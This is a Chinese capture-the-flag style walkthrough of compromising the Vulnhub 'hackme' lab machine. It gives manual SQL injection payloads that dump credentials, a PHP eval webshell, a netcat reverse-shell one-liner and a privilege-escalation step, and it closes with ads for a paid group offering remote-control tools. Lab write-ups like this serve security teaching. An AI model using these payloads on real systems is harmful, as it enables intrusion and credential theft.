渗透Vulnhub-hackme靶机

admin 2025年1月14日08:29:47评论12 views字数 1989阅读6分37秒阅读模式

本篇文章旨在为网络安全渗透测试靶机教学。通过阅读本文,读者将能够对渗透Vulnhub系列hackme靶机有一定的了解

一、信息收集阶段

靶机地址:https://download.vulnhub.com/hackme/hackme.ova‌因为靶机为本地部署虚拟机网段,查看dhcp地址池设置。得到信息IP为:192.168.60.0/24

1、扫描网段,发现主机

nmap -sP 192.168.60.0/24 
渗透Vulnhub-hackme靶机

2、扫描主机详细信息

nmap -sT -sV -sC  192.168.60.178#-sT 会尝试与目标主机的每个端口建立完整的 TCP 连接#-sV 尝试确定每个打开端口上运行的服务的版本#-sC 使用默认的脚本扫描(Script Scanning)可以帮助发现更多的信息,如漏洞、配置错误等
渗透Vulnhub-hackme靶机
渗透Vulnhub-hackme靶机

二、攻击阶段

1、web目录枚举

dirb http://192.168.60.178http://192.168.60.178/login.phphttp://192.168.60.178/uploads/
渗透Vulnhub-hackme靶机

2、尝试注册用户

渗透Vulnhub-hackme靶机
渗透Vulnhub-hackme靶机
渗透Vulnhub-hackme靶机

3、搜索信息

渗透Vulnhub-hackme靶机
渗透Vulnhub-hackme靶机

4、sql手工注入

(1)判断列数

oscp' or 1=1 order by 3 -- qwq
渗透Vulnhub-hackme靶机

(2)联合查询

oscp' or 1=1 order by 3 -- qwq
渗透Vulnhub-hackme靶机

(3)查询当前

oscp' union select database(),2,3 -- qwq   # webapphacking 
渗透Vulnhub-hackme靶机

(4)暴数据库

oscp' union select group_concat(schema_name),2,3 from information_schema.schemata -- qwq# information_schema,mysql,performance_schema,sys,webapphacking
渗透Vulnhub-hackme靶机

(5)暴当前数据库的表

oscp' union select group_concat(table_name),2,3 from information_schema.tables where table_schema=database() -- qwq#  books,users
渗透Vulnhub-hackme靶机

(6)users表的列(字段)

oscp' union select group_concat(column_name),2,3 from information_schema.columns where table_schema=database() and table_name="users" -- qwq # id,user,pasword,name,address
渗透Vulnhub-hackme靶机

(7)暴表数据

oscp' union select group_concat(user,'-',pasword),2,3 from users -- qwq # user1-5d41402abc4b2a76b9719d911017c592   MD5解密:hello# user2-6269c4f71a55b24bad0f0267d9be5508  MD5解密:commando# user3-0f359740bd1cda994f8b55330c86d845  MD5解密:p@ssw0rd# test-05a671c66aefea124cc08b76ea6d30bb   MD5解密:testtest# superadmin-2386acb2cf356944177746fc92523983  MD5解密:Uncrackable# test1-05a671c66aefea124cc08b76ea6d30bb  MD5解密:testtest# abc-e10adc3949ba59abbe56e057f20f883e  MD5解密:123456
渗透Vulnhub-hackme靶机

5、登录superadmin账号

通过sql注入获得superman账号 密码:Uncrackable

渗透Vulnhub-hackme靶机
渗透Vulnhub-hackme靶机

6、上传一句话木马

渗透Vulnhub-hackme靶机
<?php @eval($_POST['cmd']);?>
渗透Vulnhub-hackme靶机
渗透Vulnhub-hackme靶机

7、蚁剑连接一句话

渗透Vulnhub-hackme靶机
渗透Vulnhub-hackme靶机

8、反弹shell

nc -lvvp  4444
渗透Vulnhub-hackme靶机
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.60.128 4444 >/tmp/f
渗透Vulnhub-hackme靶机
渗透Vulnhub-hackme靶机

三、提权阶段

1、信息收集

cd /home/legacy
渗透Vulnhub-hackme靶机

2、执行提权文件

.touchmenot
渗透Vulnhub-hackme靶机

内部帮会

可以加入一下我们的帮会,是真正的红队大佬创建的,里面会定时丢些网上没有的工具(比如安卓远控7.4,不过现在已经删除了,有时限,加入的记得看好时间),现在只要99就可以终身,后面人多了就会涨价了

渗透Vulnhub-hackme靶机
渗透Vulnhub-hackme靶机

OSCP培训咨询

在你还在犹豫是否要报名oscp的时候,别人已经行动了,在学习完oscp培训和泷羽sec的红队全栈课后别人在那月入过万了而你却还在为没有能力证明和没有工作而发愁,那为什么不行动起来呢?想报名oscp的欢迎找我咨询,oscp课程给的惊喜:

渗透Vulnhub-hackme靶机

原文始发于微信公众号(泷羽SEC-ohh):渗透Vulnhub-hackme靶机

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年1月14日08:29:47
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   渗透Vulnhub-hackme靶机https://cn-sec.com/archives/3625459.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息